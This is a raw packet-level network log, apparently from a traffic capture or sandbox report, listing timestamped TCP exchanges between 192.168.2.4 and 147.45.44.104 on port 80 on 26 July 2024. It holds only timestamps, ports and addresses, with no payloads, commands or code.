Jul 26, 2024 18:56:41.306564093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306572914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306581974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306585073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306596994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306603909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306610107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306618929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306624889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306643009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306665897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.307488918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307499886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307509899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307521105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307533026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307533979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.307543993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307555914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307557106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.307569981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307570934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.307584047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307595015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307595968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.307606936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307617903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307620049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.307627916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.307641029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.307662010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.308248997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.308259964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.308269978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.308280945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.308293104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.308295965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.308310986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.308327913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.326200008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326239109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326251030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326262951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.326278925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.326294899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.326419115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326431990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326462030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.326565027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326576948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326587915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326600075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326611996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.326626062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.326659918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.326977015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326988935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.326998949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327009916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327022076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327023983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327034950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327047110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327049017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327068090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327081919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327399969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327411890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327420950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327433109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327445984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327450037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327462912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327472925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327474117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327486038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327487946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327498913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327511072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327512026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327523947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.327536106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.327553034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.392749071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.392811060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.392824888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.392827988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.392863035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.392868996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.392956018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.392968893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.392980099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.392991066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.392993927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393011093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393028021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393219948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393230915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393241882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393259048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393270969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393296003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393311024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393325090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393332958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393336058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393347979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393349886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393362045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.393367052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393383980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.393399000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394017935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394030094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394042015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394053936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394062996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394063950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394077063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394082069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394089937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394105911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394124031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394720078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394731045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394741058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394752979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394763947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394766092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394778013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394783974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394790888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394800901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394803047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394813061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394824028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394824982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394836903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394844055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394848108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394860983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.394861937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394880056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.394896984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395497084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395510912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395522118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395533085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395539045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395545006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395555973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395556927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395569086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395577908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395580053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395592928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395596027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395605087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395617008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395627022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395638943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.395643950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395658016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395658016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395658016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.395697117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.396475077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396507025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396517992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396531105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396538973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.396542072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396553993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396564960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396569967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.396578074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396589041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396589041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.396600962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396604061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.396615028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396624088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.396626949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396639109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.396640062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.396656990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.396676064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.397460938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397474051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397484064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397495031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397505999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397515059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.397516966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397530079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397541046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397551060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397557974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.397563934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397576094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397582054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.397588968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397598982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397600889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.397612095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.397619963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.397634983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.397661924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.398308992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.398324966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.398335934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.398346901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.398354053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.398359060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.398374081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.398402929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.416667938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.416692972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.416704893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.416729927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.416759014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.416843891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.416861057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.416867971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.416879892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.416883945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.416907072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.416932106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417105913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417146921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417201042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417212009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417236090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417248964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417323112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417357922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417452097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417464018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417476892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417486906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417490959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417500973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417516947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417534113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417733908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417746067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417756081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417768002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417773008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417781115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417793036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417800903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417805910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417817116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417819023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417831898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.417840958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.417866945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.418459892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.418472052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.418483019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.418494940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.418504953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.418520927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.418545961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.483819962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.483854055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.483867884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.483922958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.483969927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484044075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484056950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484069109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484080076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484106064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484178066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484230995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484262943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484275103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484287024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484298944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484309912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484316111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484334946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484361887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484780073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484793901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484806061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484817982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484824896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484829903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484839916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484843969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484858990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484869003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484869957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.484883070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.484908104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.485318899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485335112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485344887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485357046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485363007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.485369921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485382080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485393047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.485394001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485407114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485416889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.485419035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485430956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.485431910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485445976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485455990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.485457897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485471010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.485481024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.485496044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.485518932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.486284018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486295938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486306906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486323118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486334085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.486335039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486347914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486360073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486360073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.486372948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486373901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.486387014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486397028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.486397982 CEST	80	49757	147.45.44.104	192.168.2.4
